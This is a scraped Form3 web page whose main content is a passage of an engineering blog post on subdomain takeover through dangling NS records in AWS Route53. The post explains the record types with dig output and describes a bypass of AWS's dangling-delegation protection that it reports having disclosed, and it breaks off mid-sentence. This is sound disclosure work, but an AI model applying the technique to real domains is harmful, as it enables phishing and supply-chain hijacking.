[{"data":1,"prerenderedAt":965},["ShallowReactive",2],{"nav_featured_podcast":3,"nav_featured_press_release":21,"navigation_content":30,"engineering_blog_post:dangling-danger":377},{"uid":4,"title":5,"episodeLabel":6,"dateLabel":7,"episodeArt":8,"href":20},"from-payment-rails-to-connectivity","From Payment Rails to Connectivity, with The Clearing House's David Watson","EPISODE 5","August 18, 2026",{"dimensions":9,"alt":12,"copyright":13,"url":14,"id":15,"edit":16},{"width":10,"height":11},1064,652,"Payments Cannot Fail — Episode 05 with David Watson",null,"\u002F_prismic-media\u002Fd80df2e47c3ecb6f-cFcyPAgzKCMQEaND_Episode-05-David.jpg","cFcyPAgzKCMQEaND",{"x":17,"y":17,"zoom":18,"background":19},0,1,"transparent","\u002Fresources\u002Fpodcasts\u002Ffrom-payment-rails-to-connectivity",{"uid":22,"title":23,"tag":24,"dateLabel":25,"imageUrl":26,"imageAlt":27,"href":28,"imageFit":29},"form3-expands-strategic-partnership-with-sumup","Form3 expands strategic partnership with SumUp to bring real-time SEPA payments to millions of European small businesses","EU","February 25, 2026","\u002F_prismic-media\u002F3e91177f91478610-QA44Gzev0_tdg3ZI_SumUp.jpg","sumup","\u002Fresources\u002Fpress-releases\u002Fform3-expands-strategic-partnership-with-sumup","cover",{"header":31,"platform":59,"solutions":91,"developers":133,"company":155,"resources":184,"partnerships":208,"footer":220,"mobile":324},{"ctaLabel":32,"ctaHref":33,"topNav":34},"TALK TO OUR TEAM","\u002Fcontact",[35,39,43,47,51,55],{"label":36,"href":37,"key":38},"Platform","\u002Fplatform","platform",{"label":40,"href":41,"key":42},"Solutions","\u002Fsolutions","solutions",{"label":44,"href":45,"key":46},"Developers","\u002Fdevelopers","developers",{"label":48,"href":49,"key":50},"Company","\u002Fcompany","company",{"label":52,"href":53,"key":54},"Resources","\u002Fresources","resources",{"label":56,"href":57,"key":58},"Partnerships","\u002Fpartnerships","partnerships",{"sectionEyebrow":60,"primary":61,"productLinks":65,"enterprise":81,"trustFabric":86},"Explore the Platform",{"heading":62,"body":63,"ctaLabel":64,"ctaHref":37},"Our Payments Platform","A resilient, cloud-native platform powering real-time account-to-account payments at global scale.","See How It Works",[66,69,72,75,78],{"label":67,"href":68},"Payments Processing & Gateway","\u002Fpayments-processing-gateway",{"label":70,"href":71},"Orchestration & Intelligent Routing","\u002Forchestration-intelligent-routing",{"label":73,"href":74},"Payments Simulator","\u002Fpayments-simulator",{"label":76,"href":77},"Sponsor Bank Enablement","\u002Fsponsor-bank-enablement",{"label":79,"href":80},"Inform3d UI","\u002Finform3d-ui",{"heading":82,"body":83,"ctaLabel":84,"ctaHref":85},"Form3 Enterprise","Deploy and manage proven cloud-native payments technology in the environment that works for your institution.","Deploy Enterprise","\u002Fplatform\u002Fenterprise",{"heading":87,"body":88,"ctaLabel":89,"ctaHref":90},"Form3 Trust Fabric","Manage TLS certificates, cryptographic vulnerabilities and quantum readiness at scale, with continuous visibility.","Deploy Trust Fabric","\u002Fplatform\u002Ftrust-fabric",{"regionsIntro":92,"regions":98,"industries":118},{"eyebrow":93,"heading":94,"headingLine2":95,"body":96,"ctaLabel":64,"ctaHref":97},"Regions","Global Reach.","Regional Expertise.","A proven payments platform serving organizations worldwide, with specialized experience across North America, United Kingdom, and Europe.","\u002Fglobal",[99,108,113],{"label":100,"description":101,"ctaLabel":102,"href":103,"extraLinks":104},"North America","Real-time infrastructure, through a resilient, multi-cloud platform built for scale and regulatory confidence.","US HOME","\u002Fsolutions\u002Funited-states",[105],{"label":106,"href":107},"CANADA HOME","\u002Fsolutions\u002Fcanada",{"label":109,"description":110,"ctaLabel":111,"href":112},"United Kingdom","Powering account-to-account payments at the heart of the UK financial ecosystem, with proven resilience.","UK HOME","\u002Fsolutions\u002Funited-kingdom",{"label":114,"description":115,"ctaLabel":116,"href":117},"Europe","Enabling secure, real-time and SEPA payments across European markets through a unified, cloud-native platform.","EUROPE HOME","\u002Fsolutions\u002Feurope",{"eyebrow":119,"links":120},"Industries",[121,125,129],{"label":122,"href":123,"iconSrc":124},"Financial Services","\u002Fsolutions\u002Findustries\u002Ffinancial-services","\u002F_prismic-media\u002F29c09c45caa89db9-kbUHZmgTmuIMbo1t_FinancialServices_menu.svg",{"label":126,"href":127,"iconSrc":128},"Fintech","\u002Fsolutions\u002Findustries\u002Ffintech","\u002F_prismic-media\u002F6de3e7cb4dd8d874-SjwNe6Nh-bbuTi0P_Fintech_menu.svg",{"label":130,"href":131,"iconSrc":132},"Government","\u002Fsolutions\u002Findustries\u002Fgovernment","\u002F_prismic-media\u002Fe71bc3a74a1d2142-kaGgdituzKDnVTbm_Government_menu.svg",{"engineering":134,"api":142,"pressEyebrow":154},{"eyebrow":135,"links":136},"Engineering",[137,139],{"label":135,"href":138},"\u002Fengineering",{"label":140,"href":141},"Accreditations","\u002Faccreditations",{"eyebrow":143,"links":144},"API",[145,148,151],{"label":146,"href":147},"API Docs","https:\u002F\u002Fwww.api-docs.form3.tech\u002F",{"label":149,"href":150},"API Tutorials","https:\u002F\u002Fwww.api-docs.form3.tech\u002Fapi\u002Ftutorials\u002Fgetting-started\u002Fintroduction",{"label":152,"href":153},"API Status","https:\u002F\u002Fstatus.form3.tech\u002F","Latest Press Release",{"about":156,"people":171,"podcastEyebrow":183},{"eyebrow":157,"links":158},"About",[159,162,165,168],{"label":160,"href":161},"Our Story","\u002Fcompany\u002Four-story",{"label":163,"href":164},"Our Team","\u002Fcompany\u002Fteam",{"label":166,"href":167},"Our Success & Strategic Approach","\u002Fcompany\u002Four-success",{"label":169,"href":170},"Customer Stories","\u002Fcompany\u002Fcustomer-stories",{"eyebrow":172,"links":173},"People",[174,177,180],{"label":175,"href":176},"Careers","\u002Fcompany\u002Fcareers",{"label":178,"href":179},"Vacancies","\u002Fcompany\u002Fvacancies",{"label":181,"href":182},"Culture","\u002Fcompany\u002Fculture","Latest Podcast",{"intro":185,"links":189,"pressEyebrow":154,"podcastEyebrow":183},{"eyebrow":52,"heading":186,"body":187,"ctaLabel":188,"ctaHref":53},"Form3 Resources","Our Resources bring together thought leadership, engineering insights, payments expertise, webinars, podcasts, whitepapers, company news and stories from our teams—all in one place.","LEARN MORE",[190,193,196,199,202,205],{"label":191,"href":192},"Payments Cannot Fail Podcast","\u002Fresources\u002Fpodcasts",{"label":194,"href":195},"Press Releases","\u002Fresources\u002Fpress-releases",{"label":197,"href":198},"Payment Insights","\u002Fresources\u002Fpayment-insights",{"label":200,"href":201},"Culture Blog","\u002Fresources\u002Fculture-blog",{"label":203,"href":204},"Engineering Blog","\u002Fresources\u002Fengineering-blog",{"label":206,"href":207},"Events","\u002Fevents",{"intro":209,"links":213,"pressEyebrow":154},{"eyebrow":56,"heading":210,"body":211,"ctaLabel":212,"ctaHref":57},"Partner with Form3","Explore how Form3 works with banks, fintechs, cloud providers, technology platforms and system integrators to accelerate payment modernization, strengthen customer offerings and unlock new opportunities for growth.","Let's Partner Together",[214,217],{"label":215,"href":216},"Technical & Ecosystem Partners","\u002Fpartnerships\u002Ftechnical-ecosystem",{"label":218,"href":219},"Channel & Distribution Partners","\u002Fpartnerships\u002Fchannel-distribution",{"platform":221,"region":228,"development":239,"company":247,"resources":258,"partnerships":266,"stayConnected":271,"legalLinks":291,"certifications":313},{"title":36,"links":222},[223,224,225,226,227],{"label":62,"href":37},{"label":67,"href":68},{"label":70,"href":71},{"label":73,"href":74},{"label":76,"href":77},{"title":229,"links":230},"Region",[231,233,235,236,237],{"label":232,"href":97},"Global",{"label":234,"href":103},"United States",{"label":109,"href":112},{"label":114,"href":117},{"label":238,"href":107},"Canada",{"title":240,"links":241},"Development",[242,243,244,245,246],{"label":135,"href":138},{"label":140,"href":141},{"label":146,"href":147},{"label":149,"href":150},{"label":152,"href":153},{"title":48,"links":248},[249,250,251,252,253,254,255],{"label":160,"href":161},{"label":163,"href":164},{"label":169,"href":170},{"label":175,"href":176},{"label":178,"href":179},{"label":181,"href":182},{"label":256,"href":257},"Net Zero","\u002Fcompany\u002Fnet-zero",{"title":52,"links":259},[260,261,262,263,264,265],{"label":186,"href":53},{"label":191,"href":192},{"label":194,"href":195},{"label":200,"href":201},{"label":203,"href":204},{"label":206,"href":207},{"title":56,"links":267},[268,269,270],{"label":210,"href":57},{"label":215,"href":216},{"label":218,"href":219},{"title":272,"body":273,"ctaLabel":32,"ctaHref":33,"social":274},"Stay Connected","Form3 is a global account-to-account financial fabric delivering a proven payments platform trusted by banks and fintechs to deliver resilient, real-time payment experiences for their customers at scale.",[275,279,283,287],{"label":276,"href":277,"icon":278},"LinkedIn","https:\u002F\u002Fwww.linkedin.com\u002Fcompany\u002Fform3-financial-cloud\u002F","linkedin",{"label":280,"href":281,"icon":282},"X","https:\u002F\u002Fwww.x.com\u002FForm3Cloud","x",{"label":284,"href":285,"icon":286},"YouTube","https:\u002F\u002Fwww.youtube.com\u002F@Form3Cloud","youtube",{"label":288,"href":289,"icon":290},"Instagram","https:\u002F\u002Fwww.instagram.com\u002Fform3.tech","instagram",[292,295,298,301,304,307,310],{"label":293,"href":294},"Terms & Conditions","\u002Flegal\u002Fterms-and-conditions",{"label":296,"href":297},"Privacy Policy","\u002Flegal\u002Fdata-privacy-statement",{"label":299,"href":300},"Recruitment Data Policy","\u002Flegal\u002Frecruitment-data-policy",{"label":302,"href":303},"Modern Slavery Statement","\u002Flegal\u002Fmodern-slavery",{"label":305,"href":306},"License","\u002Flegal\u002Flicense",{"label":308,"href":309},"Cookie Policy","\u002Flegal\u002Fcookie-policy",{"label":311,"href":312},"Manage Cookies","#cookies",[314,316,318,320,322],{"label":315},"ISO 27001",{"label":317},"ISO 27017",{"label":319},"ISO 27018",{"label":321},"ISAE 3000 SOC 2 Type II",{"label":323},"ISO 22301",{"platform":325,"solutions":340,"developers":354,"company":364,"resources":365,"partnerships":373},[326,328,338,339],{"kind":327,"label":62,"href":37},"link",{"kind":329,"label":60,"children":330},"group",[331,332,333,334,336],{"label":67,"href":68},{"label":70,"href":71},{"label":73,"href":74},{"label":76,"href":335},"\u002Fplatform\u002Fsponsor-bank-enablement",{"label":79,"href":337},"\u002Fplatform\u002Finform3d-ui",{"kind":327,"label":82,"href":85},{"kind":327,"label":87,"href":90},[341,343,349],{"kind":327,"label":232,"href":342},"\u002Fsolutions\u002Fglobal",{"kind":329,"label":93,"children":344},[345,346,347,348],{"label":234,"href":103},{"label":238,"href":107},{"label":109,"href":112},{"label":114,"href":117},{"kind":329,"label":119,"children":350},[351,352,353],{"label":122,"href":123},{"label":126,"href":127},{"label":130,"href":131},[355,359],{"kind":329,"label":135,"children":356},[357,358],{"label":135,"href":138},{"label":140,"href":141},{"kind":329,"label":143,"children":360},[361,362,363],{"label":146,"href":147},{"label":149,"href":150},{"label":152,"href":153},[],[366,367,368,369,370,371,372],{"kind":327,"label":186,"href":53},{"kind":327,"label":191,"href":192},{"kind":327,"label":194,"href":195},{"kind":327,"label":197,"href":198},{"kind":327,"label":200,"href":201},{"kind":327,"label":203,"href":204},{"kind":327,"label":206,"href":207},[374,375,376],{"kind":327,"label":210,"href":57},{"kind":327,"label":215,"href":216},{"kind":327,"label":218,"href":219},{"id":378,"uid":379,"url":380,"type":381,"href":382,"tags":383,"first_publication_date":384,"last_publication_date":385,"slugs":386,"linked_documents":388,"lang":389,"alternate_languages":390,"data":391},"alz0ohEAACoAUWY8","dangling-danger","\u002Fresources\u002Fengineering-blog\u002Fdangling-danger","engineering_blog_post","https:\u002F\u002Fform3-website.cdn.prismic.io\u002Fapi\u002Fv2\u002Fdocuments\u002Fsearch?ref=apjJ1BEAAC0AJxzl&q=%5B%5B%3Ad+%3D+at%28document.id%2C+%22alz0ohEAACoAUWY8%22%29+%5D%5D",[],"2026-07-19T16:22:02+0000","2026-08-27T02:07:03+0000",[387],"what-are-ns-records",[],"en-us",[],{"title":392,"excerpt":393,"card_image":394,"published_date":401,"reading_time":402,"tag":403,"dek":404,"featured_image":405,"about_form3":413,"client_about_heading":13,"client_about_body":414,"author_name":415,"author_title":416,"author_photo":417,"author_bio":424,"author_linkedin":429,"slices":434,"meta_title":392,"meta_description":393},"Dangling Danger: Route53's Flawed Dangling NS Record Protection","A subdomain takeover is a class of attack in which an adversary is able to serve unauthorized content from victim's domain name. It can be used for phishing, supply chain compromise, and other forms of attacks which rely on deception. You might've heard about CNAME based or NS based subdomain takeovers.",{"dimensions":395,"alt":392,"copyright":13,"url":397,"id":398,"edit":399},{"width":396,"height":396},800,"\u002F_prismic-media\u002F72aed5750a0a36d7-9zWrpK3D8_sC7Meg_dangling-danger.jpg","9zWrpK3D8_sC7Meg",{"x":17,"y":17,"zoom":18,"background":400},"#ffffff","2023-10-27",10,"Blogs","A subdomain takeover is a class of attack in which an adversary is able to serve unauthorized content from victim's domain name. It can be used for phishing, supply chain compromise, and other forms of attacks which rely on deception. You might've heard about CNAME based or NS based subdomain takeovers.While classic DNS takeovers are becoming harder and harder to execute as vendors implement better protection against them, there are still novel attack techniques to be discovered. In this article we'll explore a dangling record protection bypass on AWS's Route53 service.This blog post should accommodate people with different experience levels, feel free to skip a few sections if you understand the classic DNS takeovers on Route53.",{"dimensions":406,"alt":409,"copyright":13,"url":410,"id":411,"edit":412},{"width":407,"height":408},872,174,"Domain, Record & Value table","\u002F_prismic-media\u002F2032471280d43172-YAW3DgO2oI2B9zRn_f64b6dba-b152-46d6-a33e-7939d0c.svg","YAW3DgO2oI2B9zRn",{"x":17,"y":17,"zoom":18,"background":400},[],[],"Maciej Mionskowski","Offensive Security Engineer",{"dimensions":418,"alt":415,"copyright":13,"url":421,"id":422,"edit":423},{"width":419,"height":420},317,473,"\u002F_prismic-media\u002Fc95cdd1f6c30363a-jOxXfOcm1e30g6mY_1b7a4303-9ca7-4477-af48-eed77e4.jpg","jOxXfOcm1e30g6mY",{"x":17,"y":17,"zoom":18,"background":400},[425],{"type":426,"text":427,"spans":428},"paragraph","Maciej is an Offensive Security Engineer at Form3. Transitioning from a background in Platform and Software Engineering, he thrives on challenges that push the boundaries of his expertise. Outside of work, he's passionate about sailing, rock climbing, and playing board games.",[],{"link_type":430,"key":431,"url":432,"target":433},"Web","7277e9c9-eba4-41fd-a165-2cdc6a56426b","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fmionskowski\u002F","_blank",[435,457,484,498,515,535,545,587,595,606,623,631,651,667,675,693,711,725,760,774,785,802,810,835,852,860,868,884,892,900,908,916,930,954],{"variation":436,"version":437,"items":438,"primary":439,"id":455,"slice_type":456,"slice_label":13},"default","initial",[],{"body":440},[441,445,448],{"type":442,"text":443,"spans":444},"heading2","What are NS records",[],{"type":426,"text":446,"spans":447},"A Name Server (NS) record describes the DNS server that contains actual DNS records for a given domain, later referred to as an authoritative nameserver (aNS).",[],{"type":426,"text":449,"spans":450},"Consider the following record in the example.com. DNS zone:",[451],{"start":452,"end":453,"type":454},37,49,"strong","rich_text$5f9e0d17-059d-4ed1-ab7f-81aeec97b3ef","rich_text",{"variation":436,"version":458,"items":459,"primary":460,"id":482,"slice_type":483,"slice_label":13},"",[],{"eyebrow":13,"heading":461,"body":462,"cta_label":13,"cta_link":463,"aside_type":465,"aside_image":466,"aside_video":469,"aside_video_poster":471,"aside_video_reduced_motion":472,"aside_video_url":13,"aside_embed":473,"pardot_form_url":13,"form_submit_label":13,"form_variant":474,"form_heading":13,"redirect_on_success":475,"theme":477,"overlay_pattern":478,"background_continuation":479,"media_position":480,"aside_vertical_align":481},[],[],{"link_type":464},"Any","Image",{"dimensions":467,"alt":409,"copyright":13,"url":410,"id":411,"edit":468},{"width":407,"height":408},{"x":17,"y":17,"zoom":18,"background":400},{"link_type":470},"Media",{},{},{},"Contact (default)",{"link_type":476},"Document","Light","None","Solid color (no gradient)","Right","Top of section","content_block$07308cce-bf36-4503-b770-4b07f52b12a8","content_block",{"variation":436,"version":437,"items":485,"primary":486,"id":497,"slice_type":456,"slice_label":13},[],{"body":487},[488],{"type":426,"text":489,"spans":490},"And the following record in the sub.example.com. zone hosted behind ns-240.awsdns-30.com:",[491,494],{"start":492,"end":493,"type":454},32,48,{"start":495,"end":496,"type":454},68,88,"rich_text$05ef6281-d453-4b12-8e32-95094f952369",{"variation":436,"version":458,"items":499,"primary":500,"id":514,"slice_type":483,"slice_label":13},[],{"eyebrow":13,"heading":501,"body":502,"cta_label":13,"cta_link":503,"aside_type":465,"aside_image":504,"aside_video":509,"aside_video_poster":510,"aside_video_reduced_motion":511,"aside_video_url":13,"aside_embed":512,"pardot_form_url":13,"form_submit_label":13,"form_variant":474,"form_heading":13,"redirect_on_success":513,"theme":477,"overlay_pattern":478,"background_continuation":479,"media_position":480,"aside_vertical_align":481},[],[],{"link_type":464},{"dimensions":505,"alt":409,"copyright":13,"url":506,"id":507,"edit":508},{"width":407,"height":408},"\u002F_prismic-media\u002Fe5526846c41a1479-1MTJBQmD_lAyI7jC_98ffb791-499e-4721-9b5d-069d5bc.svg","1MTJBQmD_lAyI7jC",{"x":17,"y":17,"zoom":18,"background":400},{"link_type":470},{},{},{},{"link_type":476},"content_block$c6f72cba-7472-406c-ba3d-f1255a8b3097",{"variation":436,"version":437,"items":516,"primary":517,"id":534,"slice_type":456,"slice_label":13},[],{"body":518},[519,528],{"type":426,"text":520,"spans":521},"If you try to resolve any record in sub.example.com. the DNS resolver will contact ns-240.awsdns-30.com (aNS) to fetch the records.",[522,525],{"start":523,"end":524,"type":454},36,52,{"start":526,"end":527,"type":454},83,103,{"type":426,"text":529,"spans":530},"We can observe that if we run dig +trace A sub.example.com",[531],{"start":532,"end":533,"type":454},30,58,"rich_text$7cf58196-6d88-4e8a-a26a-b339fd7fb556",{"variation":436,"version":437,"items":536,"primary":537,"id":543,"slice_type":544,"slice_label":13},[],{"language_label":13,"code":538},[539],{"type":540,"text":541,"spans":542},"preformatted","$ dig +trace A sub.example.com\n\n; \u003C\u003C>> DiG 9.10.6 \u003C\u003C>> +trace A sub.example.com\n;; global options: +cmd\n.                       30      IN      NS      c.root-servers.net.\n.                       30      IN      NS      l.root-servers.net.\n\u003Csnip>\n;; Received 525 bytes from 127.0.0.1#53(127.0.0.1) in 91 ms\n\ncom.                    172800  IN      NS      a.gtld-servers.net.\ncom.                    172800  IN      NS      k.gtld-servers.net.\n\u003Csnip>\n;; Received 1182 bytes from 193.0.14.129#53(k.root-servers.net) in 62 ms\n\nexample.com.     172800  IN      NS      ns-1790.awsdns-31.co.uk.\nexample.com.     172800  IN      NS      ns-1392.awsdns-46.org.\n\u003Csnip>\n;; Received 753 bytes from 192.5.6.30#53(a.gtld-servers.net) in 41 ms\n\nsub.example.com. 300     IN      NS      ns-240.awsdns-30.com.\n;; Received 348 bytes from 205.251.197.112#53(ns-1392.awsdns-46.org) in 43 ms\n\nsub.example.com. 300     IN      A       127.0.0.1\n;; Received 185 bytes from 205.251.192.240#53(ns-240.awsdns-30.com) in 40 ms",[],"code_block$d9c01425-ec61-4a3d-9506-30af0c964778","code_block",{"variation":436,"version":437,"items":546,"primary":547,"id":586,"slice_type":456,"slice_label":13},[],{"body":548},[549,552,558,568],{"type":442,"text":550,"spans":551},"What is a dangling NS record",[],{"type":426,"text":553,"spans":554},"A dangling NS record (label NS nameserver) is a NS record that either:",[555],{"start":556,"end":557,"type":454},22,41,{"type":559,"text":560,"spans":561},"o-list-item","(1) points to a non existing nameserver (e.g. sub.example.com NS ns.expired-domain.com) or",[562,565],{"start":563,"end":564,"type":454},29,39,{"start":566,"end":567,"type":454},46,86,{"type":559,"text":569,"spans":570},"(2) points to a nameserver that does not have the label zone configured, e.g. sub.example.com NS ns-1790.awsdns-31.co.uk where queries for sub.example.com to that nameserver are REFUSED",[571,574,577,580,583],{"start":572,"end":573,"type":454},16,26,{"start":575,"end":576,"type":454},50,55,{"start":578,"end":579,"type":454},78,120,{"start":581,"end":582,"type":454},139,154,{"start":584,"end":585,"type":454},178,185,"rich_text$4650bb76-a8bf-4da1-828a-ec0795a03111",{"variation":436,"version":437,"items":588,"primary":589,"id":594,"slice_type":544,"slice_label":13},[],{"language_label":13,"code":590},[591],{"type":540,"text":592,"spans":593},"dig sub.example.com @ns-1790.awsdns-31.co.uk\n\n; \u003C\u003C>> DiG 9.10.6 \u003C\u003C>> sub.example.com @ns-1790.awsdns-31.co.uk\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER\u003C\u003C- opcode: QUERY, status: REFUSED, id: 2694",[],"code_block$9cd9b44e-7e06-4441-8911-43feb04ed863",{"variation":436,"version":437,"items":596,"primary":597,"id":605,"slice_type":456,"slice_label":13},[],{"body":598},[599,602],{"type":426,"text":600,"spans":601},"It's worth noting that any dangling NS records are undesired and should be treated as misconfiguration.",[],{"type":426,"text":603,"spans":604},"In this article we will focus on the second scenario in the context of Route53\u002FAWS name servers.",[],"rich_text$86d54f14-7f11-42fc-aa50-0924c5361468",{"variation":436,"version":437,"items":607,"primary":608,"id":622,"slice_type":456,"slice_label":13},[],{"body":609},[610,613,619],{"type":442,"text":611,"spans":612},"How could you perform a subdomain takeover in Route53",[],{"type":426,"text":614,"spans":615},"When a hosted zone is created in Route53 it's assigned a set of name servers from a shared pool.",[616],{"start":617,"end":618,"type":454},84,95,{"type":426,"text":620,"spans":621},"e.g.",[],"rich_text$0174a2d8-c41d-4465-baac-bd4053661908",{"variation":436,"version":437,"items":624,"primary":625,"id":630,"slice_type":544,"slice_label":13},[],{"language_label":13,"code":626},[627],{"type":540,"text":628,"spans":629},"Hosted zone name\nsub.example.com\n\nName servers\nns-1881.awsdns-43.co.uk\nns-2.awsdns-00.com\nns-1190.awsdns-20.org\nns-734.awsdns-27.net",[],"code_block$65d764bc-2fd5-458f-9097-6bee9a696d7d",{"variation":436,"version":437,"items":632,"primary":633,"id":650,"slice_type":456,"slice_label":13},[],{"body":634},[635,640,645],{"type":426,"text":636,"spans":637},"The format of the nameservers that are assigned follows ns-{id}.awsdns-{id2}.{domain} pattern, where:",[638],{"start":639,"end":567,"type":454},56,{"type":559,"text":641,"spans":642},"{id} is a number between 0 and 2048",[643],{"start":17,"end":644,"type":454},4,{"type":559,"text":646,"spans":647},"{id2} is a two-digit number between 00 and 64.",[648],{"start":17,"end":649,"type":454},5,"rich_text$148994f5-fbea-405d-9431-c587268c6897",{"variation":436,"version":437,"items":652,"primary":653,"id":666,"slice_type":456,"slice_label":13},[],{"body":654},[655,658],{"type":426,"text":656,"spans":657},"Note, that only a subset of all combinations are used.",[],{"type":426,"text":659,"spans":660},"Usually, you would reference the sub.example.com nameservers in your example.com hosted zone like this:",[661,663],{"start":662,"end":493,"type":454},33,{"start":664,"end":665,"type":454},69,80,"rich_text$52a7e812-05e5-4476-92a3-72a062a006ca",{"variation":436,"version":437,"items":668,"primary":669,"id":674,"slice_type":544,"slice_label":13},[],{"language_label":13,"code":670},[671],{"type":540,"text":672,"spans":673},"sub.example.com.\t300\tIN\tNS\tns-1881.awsdns-43.co.uk.\nsub.example.com.\t300\tIN\tNS\tns-2.awsdns-00.com.\nsub.example.com.\t300\tIN\tNS\tns-1190.awsdns-20.org.\nsub.example.com.\t300\tIN\tNS\tns-734.awsdns-27.net.",[],"code_block$7649fb84-9042-4bbe-86d3-04dac9dffb9a",{"variation":436,"version":437,"items":676,"primary":677,"id":692,"slice_type":456,"slice_label":13},[],{"body":678},[679,687],{"type":426,"text":680,"spans":681},"Now, what happens if sub.example.com. zone is deleted, but the NS records in example.com. are not?",[682,684],{"start":683,"end":452,"type":454},21,{"start":685,"end":686,"type":454},77,89,{"type":426,"text":688,"spans":689},"There are dangling nameserver records left which anyone could register a sub.example.com. zone against (using brute force) and perform a subdomain hijack.",[690],{"start":691,"end":686,"type":454},73,"rich_text$a88ab375-d181-4572-9940-86eb02538381",{"variation":436,"version":458,"items":694,"primary":695,"id":710,"slice_type":483,"slice_label":13},[],{"eyebrow":13,"heading":696,"body":697,"cta_label":13,"cta_link":698,"aside_type":465,"aside_image":699,"aside_video":705,"aside_video_poster":706,"aside_video_reduced_motion":707,"aside_video_url":13,"aside_embed":708,"pardot_form_url":13,"form_submit_label":13,"form_variant":474,"form_heading":13,"redirect_on_success":709,"theme":477,"overlay_pattern":478,"background_continuation":479,"media_position":480,"aside_vertical_align":481},[],[],{"link_type":464},{"dimensions":700,"alt":13,"copyright":13,"url":702,"id":703,"edit":704},{"width":701,"height":407},1744,"\u002F_prismic-media\u002Fd6341568de6baee3-lLnwc0Rn5HY9otZ1_e7015fc5-9ce6-4a6d-b047-2b436a4.png","lLnwc0Rn5HY9otZ1",{"x":17,"y":17,"zoom":18,"background":19},{"link_type":470},{},{},{},{"link_type":476},"content_block$499d2366-0c2d-41d5-9ba3-a5d55ab69f8b",{"variation":436,"version":437,"items":712,"primary":713,"id":724,"slice_type":456,"slice_label":13},[],{"body":714},[715],{"type":426,"text":716,"spans":717},"This is how AWS NS subdomain takeovers worked a few years ago. There's an excellent article on the topic by Shiv Sahni:AWS NS Takeover",[718],{"start":719,"end":720,"type":721,"data":722},119,134,"hyperlink",{"link_type":430,"url":723},"https:\u002F\u002Fshivsahni2.medium.com\u002Faws-ns-takeover-356d2a293bca","rich_text$42f6c495-ccd0-4ee8-b89f-dbe09751d5e5",{"variation":436,"version":437,"items":726,"primary":727,"id":759,"slice_type":456,"slice_label":13},[],{"body":728},[729,732,735,738,746,752],{"type":442,"text":730,"spans":731},"AWS's Protection from dangling delegation records in Route 53",[],{"type":426,"text":733,"spans":734},"If you try to replicate the proof of concept linked in the Shiv's article today you aren't going to be successful.",[],{"type":426,"text":736,"spans":737},"AWS has implemented a protection against dangling delegations, but they are not vocal about the implementation details of that protection.",[],{"type":426,"text":739,"spans":740},"AWS has documented this protection in their docs, although they've since updated the documentation after our report, the current version of the documentation can be found here: https:\u002F\u002Fdocs.aws.amazon.com\u002FRoute53\u002Flatest\u002FDeveloperGuide\u002Fprotection-from-dangling-dns.html.",[741],{"start":742,"end":743,"type":721,"data":744},177,268,{"link_type":430,"url":745},"https:\u002F\u002Fdocs.aws.amazon.com\u002FRoute53\u002Flatest\u002FDeveloperGuide\u002Fprotection-from-dangling-dns.html",{"type":426,"text":747,"spans":748},"but before Oct 2023 the documentation said:",[749],{"start":644,"end":750,"type":721,"data":751},42,{"link_type":430,"url":745},{"type":426,"text":753,"spans":754},"In Route 53, when you use nameserver (NS) records to delegate the management of a subdomain to another public hosted zone, a problem could arise if the subdomain hosted zone is deleted without also deleting the delegation. Another user could potentially re-create the subdomain hosted zone and gain control via the still-active delegation belonging to the first customer. However, Route 53 protects against such “dangling” delegations by not allowing any new hosted zones with overlapping domain names to be created by using those nameservers before verifying that the delegation has first been removed.",[755,758],{"start":17,"end":756,"type":757},603,"em",{"start":17,"end":756,"type":454},"rich_text$6cf0414b-bfa1-41ab-a4b7-73873db2018c",{"variation":436,"version":437,"items":761,"primary":762,"id":773,"slice_type":456,"slice_label":13},[],{"body":763},[764,767,770],{"type":426,"text":765,"spans":766},"It got me speculating on how I would implement such protection myself and I had two ideas of what could happen upon zone creation:",[],{"type":559,"text":768,"spans":769},"Query public DNS for a newly created domain and note all NS records discovered",[],{"type":559,"text":771,"spans":772},"Query all customer NS records in Route53 that could overlap with newly created one and note all NS records discovered",[],"rich_text$497a2323-b539-4dc1-bdda-dbf01f7f302a",{"variation":436,"version":437,"items":775,"primary":776,"id":784,"slice_type":456,"slice_label":13},[],{"body":777},[778,781],{"type":426,"text":779,"spans":780},"The next step is to avoid assigning the name servers (from the shared pool) that were noted to the newly created zone.",[],{"type":426,"text":782,"spans":783},"Depending on how AWS stores the data the second option might be computationally expensive to execute, it also has a problem that the protection would only work in the realm of Route53, if a dangling record was created on another DNS provider it would not be effective.",[],"rich_text$a710bf9b-1c02-4fdb-ba27-5eb3f1650a4d",{"variation":436,"version":458,"items":786,"primary":787,"id":801,"slice_type":483,"slice_label":13},[],{"eyebrow":13,"heading":788,"body":789,"cta_label":13,"cta_link":790,"aside_type":465,"aside_image":791,"aside_video":796,"aside_video_poster":797,"aside_video_reduced_motion":798,"aside_video_url":13,"aside_embed":799,"pardot_form_url":13,"form_submit_label":13,"form_variant":474,"form_heading":13,"redirect_on_success":800,"theme":477,"overlay_pattern":478,"background_continuation":479,"media_position":480,"aside_vertical_align":481},[],[],{"link_type":464},{"dimensions":792,"alt":13,"copyright":13,"url":793,"id":794,"edit":795},{"width":701,"height":407},"\u002F_prismic-media\u002Fffe51969aac632dd-8s7cukSkgQYWdjAb_ca2351d4-219e-436b-b44c-e234f73.png","8s7cukSkgQYWdjAb",{"x":17,"y":17,"zoom":18,"background":19},{"link_type":470},{},{},{},{"link_type":476},"content_block$f6f2ba6b-acd1-4388-8fcb-123f00874656",{"variation":436,"version":437,"items":803,"primary":804,"id":809,"slice_type":456,"slice_label":13},[],{"body":805},[806],{"type":426,"text":807,"spans":808},"Therefore I had a feeling AWS could use public DNS to discover those dangling delegations. Although this is a pure speculation, with that came my next realisation.",[],"rich_text$793d807b-3c07-44ad-99d1-0e198beb0e05",{"variation":436,"version":437,"items":811,"primary":812,"id":834,"slice_type":456,"slice_label":13},[],{"body":813},[814,817,822],{"type":442,"text":815,"spans":816},"...the protection might be flawed",[],{"type":426,"text":818,"spans":819},"Imagine there's a dangling record for dangling.example.com",[820],{"start":821,"end":533,"type":454},38,{"type":426,"text":823,"spans":824},"What if you were a little cheeky and instead of creating a zone for dangling.example.com to perform the takeover, you tried to create example.com and inside it create a dangling.example.com record? AWS wouldn't be able to discover dangling.example.com has a dangling NS record since it's not possible to perform DNS enumeration easily and when creating a record the zone already has nameservers 